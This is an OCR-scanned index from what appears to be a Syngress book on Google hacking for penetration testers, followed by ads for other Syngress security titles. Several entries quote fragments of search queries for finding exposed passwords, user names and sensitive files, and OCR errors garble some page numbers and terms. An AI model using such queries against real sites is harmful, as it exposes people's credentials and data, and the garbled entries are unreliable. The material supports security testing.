66-69 Posts, removing, 357 "Powered by" tags, 188, 192-193 Pragma, no-cache, 360 Preassessment checklist, 146 information-gathering techniques, 122 Preferences, 4, 9-12 Printers, network, 257 496 Index Privacy, 428 Process of searching, 17-20 Professional security testing, 419—420 Profiling servers, 223—225 The Programmer's Ultimate Security Desk Reference, 482 Proxies, local, 457-458 Proxy checkers, 99, 117 Proxy servers anonymity, 91—92 Google translation as, 95-99 language settings, 1 1 locating, 92 translation service, 6 Pseudoanonymity, 67 Pseudocoding, 385 Putting the Tea Back into CyberTerrorism, 131 Python implementation of API, 390-393 Q q variable, 28 Queries automated, 157 locating Apache versions, 105—107 locating database error messages, 306-308 locating database files, 311 locating database interfaces, 303 locating database support files, 304-305 locating default Apache installations, 243-244 locating default documentation, 248 locating default programs, 250 locating e-mail addresses, 137-138 locating login portals, 253-255 locating more esoteric servers, 246 locating Netscape servers, 245 locating passwords, 270-273 locating potentially sensitive office documents, 301 locating specific and esoteric server versions, 107-108 locating specific IIS server versions, 244 locating SQL database dumps, 310 locating user names, 265-266 locating various network devices, 258 locating various sensitive information, 281—283 negative, 156 Querystrings, 456 Question mark (?) , 25 Quicken, 279-280 Quotation marks ("), 16, 18 R Rain Forest Puppy (RFP), 110 Range of dates, searching, 64-65 Range of numbers, searching, 63 Ranta, Don, 313 raw search type for Gooscan, 337 Recovery mechanisms, password, 275 Reduction (narrowing) of searches, 21-24 Regions, geographic, 33-34 Registration screens, 328 Registry files, Windows, 136, 268 related operator, 66 Related sites, searching, 66 Reloading, shift-, 90 Index 497 Remote scripts, 465 Rendered view, 290 Reports, locating, 173-175 Residential phone numbers, searching for, 72-73 Responses, API, 376-377 restrict codes, 32—36 restrict variable, 28, 32—33 Restriction rules, 373—374 Results, number of, 12 Results page, 5 Resumes, 142 Retina tool, 223 Robots, see Crawlers Robots.txt files, 325-327, 360, 445-446 Rotator programs, 167-170 rphonebook operator, 73 s safe variable, 29 SafeSearch Filtering, 11 Safety, 429 Sample API code, 377-383 Sample files, 449 Sample programs, 248-250 SANS Top 20 list, 220 Scanner, Nessus, 284 Scanner programs, 198 Scanning, CGI, 197-199, 201 Scraping pages, 156-158, 414 Scripts automated grinding, 312-315 cross-site scripting (XSS), 461-462, 466-468 for debugging, 304 dns-mine.pl, 158-159, 377-383 file extensions, 330 remote, 465 Search Engine Hacking forum, 262 Search fields, 3 Search rules case sensitivity, 14—15 ignored words, 15—16 limit of 10 words, 16-17 stemming (expanding), 15, 23 wildcards, 15-16 Search string for Gooscan, 337 Search-term input field, 4 Searches admin \ administrator, 210-212 Advanced Search link, 4 authors, 66-69, 164-166 automating, 331 base searches, 22 cache, Google, 62-63 criteria, 365-1305 dates within a range, 64-65 definitions of terms, 72 error \ warning, 206-207 -ext:html —ext:htm -ext:shtml —ext:asp -ext:php, 212—216 Google Desktop Search, 316 intitle: index. of, 206 intranet \ help.desk, 216-217 inurhtemp \ inurV.tmp \ inurhbackup I inurh.hak, 216 links to specified URLs, 59-62 login I logon, 208-209 message identifiers, 70-71 in newgroup post titles, 46-49 newsgroup authors, 66—69 newsgroup post titles, 66-69 numbers within a range, 63 498 Index in page text, 49-50 in page titles, 46-49 parameters, 27-28 parameters for API, yiX—yiT. password \ passcode \ "your password is," 210 phrases, 18 process, 17-20 reduction (narrowing), 21— 24 requests, API, 375-376 responses, API, 376-377 results page, 5 site summaries, 65 sites related to a site, 66 space between elements, 43 specific file types, 52-54 specific servers or domains, 52-54 stock symbols, 71-72 telephone numbers, 72-75 username \ userid \ employee. ID \ "your username is," 209 see also Search rules Secure Sockets Layer (SSL), 482 Security access, 425 actual, 425-427 alarm, 429 anomaly, 426-427 assessment, blind, 152 authentication, 428 concern, 426 confidentiality, 428 continuity, 429 data networks channel, 423 ethical hacking methodology, 420 exposure, 426 government auditing organizations, 420 ideahamsters, 421 indenmification, 428 Institute fi)r Security and Open Methodologies (ISECOM),421 integrity, 428-429 limitations, 425-427 loss controls, 427 non-repudiation, 428 operational, 424-425 patches, 331 penetration testers, 92, 222, 420 personnel channel, 423 physical channel, 423 policies, 322-323 privacy, 428 safijty, 429 scanner, Nessus, 284 standardized methodology, 423 telecommunications channel, 423 testing, professional, 419-420 trust, 425 usability, 429 visibihty, 424-425 vulnerability, 426, 444 weakness, 426-427 wireless communications channel, 423 see also Open Source Security Testing Methodology Manual (OSSTMM);Web application security (Web app sec) Security presence channels, 422—423, 431-433 SensePost, 154, 158,278,351 Server-side includes, 113 server tag in directory listings, 223-225,261 Server versions Index 499 Apache, 105-108 finding, 103 operating systems, 108 uses of, 104 Servers, Web error messages. Apache, 229-238 error messages, applications', 238-241 error messages, MS-IIS, 225—229 esoteric, 246 locating and profiling, 223—225 public, 323 safeguards, 323 searching, 52-54 see also Server versions Session hijacking, 468-471 Session management, 442 Settings, default, 330 Sexual content, 11 Shift-reloading, 90 Simple Nomad, 438 Single-query mode for Gooscan, 338-339 Site crawling, 155-156 site operator, 52-54, 77-79, 204-205, 332 Site summaries, searching, 65 SiteDigger tool, 346, 348-351, 359, 383 Snippets, 327-328 SOAP::Lite, 128 Social Security numbers (SSNs), 279 Socket-class functionality, 414 Socket initialization, 386 Software default settings, 330 Sony VAIO laptops, 145 Source code, uses for, 112-113, 189-197 Space between search elements, 43 Spam, 439 Special characters, 26, 43 Specific file types, searching, 52-54 Specific servers or domains, searching, 52-54 SPI Dynamic, 238 SQL. see Structured Query Language (SQL) SQL Server database, 475 SSL (Secure Sockets Layer), 482 SSNs (Social Security numbers) searching for, 279 Standardized methodology, 423 start variable, 28 Stock quotations, 71-72 stocks operator, 71-72 Stop words, 15 Structured Query Language (SQL) dumps, 309-310 file extension, 310 injection attacks, 301, 308, 442-443, 471-474, 484 mysql_connect function, 305 Student IDs, 279 Subdomains, 153 Submit Search button, 4 Substitution, incremental, 110—111 suUo, 332 Support files of databases, 304-306 Symbols, stock ticker, 71-72 Syntax search terms, 43 universal resource locators (URLs), 25-26 wrongness ignored, 20 System password file, 110 500 Index T Tabs, 4 Targets, vulnerable, see Vulnerable targets, locating tcpdump command, 89-90, 97 output, 90, 92-93, 97-98 Tea, Putting Back into CyberTerrorism, 131 Telecommunications channel, 423 Telephone numbers removing from Google list, 74 searching for, 72-75 Temmingh, Roelof, 128, 154, 158, 351 10-word limit, 16-17 Term input field, 4 Terms, getting definitions of, 72 Terms of Service Athena, 343 automated queries, 157, 314 Gooscan, 331-332, 334, 340 Web sites for, 368-369 Testers, penetration, 92, 222 Text of pages, searching, 49-50 Text or HTML, conversion to, 56—58 Ticker symbols, 71-72 Titles of pages , searching, 46-49 TLD (top-level domain), 154 Toolbars, 3, 14, 39 Top-level domain (TLD), 154 Topic restriction rules, 373-374 Tracing groups, 164—166 Traffic reports, 447 Translation, 5-6, 12-13 Translation proxies, 5 Translation service, 95—98 Traversal, 108-110 Trojans, 438-439 Troubleshooting, 44-45 Trust, 425 Types of files, searching, 52—54 u Unified Modeling Language (UML) diagram, 385 Universal resource locators (URLs) construction, 27-36 description, 24-25 links to specified URLs, searching for, 59-62 removal, automatic, 355-356 searching in, 50-52 special characters, 26 structure, 50 syntax, 25-26 UsabiHty, 429 USENET newsgroups, 6-7 User authentication forms, 328 User names creation process, 265 searching for, 264—270 sources for, 265—266 username \ userid \ employee. ID \ "your username is" searches, 209 Utilities, non-Google, 166-171 V VAIO laptops, 145 Versions of servers, see Server versions view source, 113 Index 501 Viruses, 438-439 Visibility, 424-425 Vulnerability, 426, 444 Vulnerability reports, 283 Vulnerable targets, locating in advisories, 186, 190 applications, vulnerable, 194—197 via CGI scanning, 197-199, 201 via demonstration pages, 187-189 via source code, 189-197 techniques, 202 w Watts, Blake, 397 Weakness, 426-427 Web Application Security Consortium, 442 Web application security (Web app sec) authentication, 442 bad file extensions, 449-45 1 client-side attacks, 459-462 command injection, 442-443, 471-474 cookies, 456, 458, 468-471 description, 438-439 error messages, 448 FTP log files, 446-447 hidden form fields and JavaScript, 453 HTML comments, 447-448 information disclosure, 443 sample files, 449 session management, 442 system documentation, 452 uniqueness, 439-440 vulnerabilities, 440-443 vulnerability, 444 Web traffic reports, 447 Web assessment tools, 238 Web-based mailing lists, 141 Web connections, logging, 88-89 Web Data Administrator software package, 302 Web-enabled network devices, 171-172, 178-179,255-258 Web filtering, 439 Web pages, personal, 140 Web results page, 5-6 Web search page, 2-4 Web servers, see Servers, Web Web sites advanced operators, 86 Athena, 359 Athena configuration files, 348 basic searching, 38 default pages, 241-246 excessive metadata, 319 file extensions, 318 FlLExt database, 56 frequently asked questions (FAQ), 85 Google Desktop Search, 318 Google details, 86 Google Groups Advanced Search feature, 127 Google Hacking Database (GHDB), 359 Google Local, 143-145 Gooscan tool, 199, 333 .htaccess files, 330 John the Ripper password cracker, 273 language-specific interfaces, 10 502 Index Lib whisker Perl library, 110 lockouts, 368 Netcraft, 171 NIKTO security database, 406 phishing, 287 proxy checkers, 99, 117 robots.txt files, 325, 360, 445-446 SANS Top 20 list, 220 SiteDigger tool, 348, 359 Terms of Service, 368-369 USENET, 6 Web Application Security Consortium, 442 Weblnspect tool, 119 Wikto tool, 199 XCode package for Macintosh, 333 Web traffic reports, 447 Web utilities, non-Google, 166—171 WebaUzer program, 267 Webcams, 256 Weblnspect tool, 119,238 Weighting, 161-163 Whisker tool, 110 Wikto tool, 199,351-354 Wildcards, 15-16 Windows registry files, 136, 268 Windows tools Athena, description of, 343-345 Athena configuration files, 345-348 Google API license keys, 348 .NET fi-amework, 342 requirements, 342 SiteDigger, 346,348-351 Wikto, 199,351-354 Windows Update, 342 Wireless communications channel, 423 "Wish fists," Amazon, 142 Word order, 86 Words in searches ignored, 15-16 limit of 10, 16-17 Worms, 164 WS_FTP program, 291 X XCode package for Macintosh, 333 XSS (cross-site scripting), 461-462, 466-468 Y "Your password is" searches, 210 "Your username is" searches, 209 z Zebra, 21 Zero day exploits, 182 e Definit Syngress: The Definition of a AVAILABLE NOW order @ www.syngress.com Syn-gress (sin-gres): noun, sing. Freedom from risk or dangler; safety. See security. Inside the SPAM Cartel For most people, the term "SPAM" conjures up the image of hundreds of annoying, and at times offensive, e-mails flooding your inbox every week. But for a few, SPAM is a way of life that delivers an adrenaline rush fueled by cash, danger, retribution, porn and the avoidance of local, federal, and international law enforcement agencies. Inside the SPAM Cartel offer readers a never-before view inside this dark sub-economy. You'll meet the characters that control the flow of money as well as the hackers and programmers committed to keeping the enterprise up and running. ISBN: 1 -932266-86-0 Price: $49.95 U.S. $72.95 CAN Nessus Network Auditing Crackers constantly probe machines looking for both old and new vulnerabilities. In order to avoid becoming a casualty of a casual cracker, savvy sys admins audit their own machines before they're probed by hostile outsiders (or even hostile insiders). Nessus is the premier Open Source vulnerability assessment tool, and was recently voted the "most popular" open source security tool of any kind. This is the first book available on Nessus and it is written by the world's premier Nessus developers led by the creator of Nessus, Renaud Deraison. ISBN: 1-931836-08-6 Price: $49.95 U.S. $69.95 CAN AVAILABLE NOW order @ www . syngress . com 1 TUB LPUUDE J Nessus Net\vqrkj\]?^]!^"B How to Own a Continent! Stealing the Network: How T8 Own a Continent Lost year. Stealing the Network: How to Own the Box became a blockbuster best- seller and garnered universal acclaim as a techno thriller firmly rooted in reality and technical accuracy. Now, the sequel is available and it's even more contro- versial than the original. Stealing the Network: How to Own a Continent 6oes for cyber-terrorism buffs what "Hunt for Red October" did for cold-war era military buffs, it develops a chillingly realistic f)lot that taps into our sense of dread and fascination with the terrible possibilities of man's inventions run amuck. ISBN: 1-931836-05-1 Price: $49.95 U.S. $69.95 CAN SYNGRESS